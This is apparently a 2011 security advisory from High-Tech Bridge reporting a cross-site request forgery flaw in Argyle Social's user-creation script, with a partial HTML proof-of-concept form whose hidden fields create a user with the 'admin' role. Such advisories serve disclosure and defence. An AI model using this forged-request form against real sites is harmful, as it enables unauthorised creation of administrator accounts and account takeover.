HTB22978: XSRF (CSRF) in Argyle Social

Subject: HTB22978: XSRF (CSRF) in Argyle Social

Vulnerability ID: HTB22978
Product: Argyle Social
Vendor: Argyle Social ( ) 
Vulnerable Version: Current at 26/04/2011
Vendor Notification: 28 April 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA Security Research Lab ( ) 

Vulnerability Details:
The vulnerability exists due to failure in the users creating script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="" method="post" name="main">
<input type="hidden" name="name" value="test">
<input type="hidden" name="email" value="">
<input type="hidden" name="code" value="usercode">
<input type="hidden" name="role" value="admin">

Copyright © 1995-2020 All rights reserved.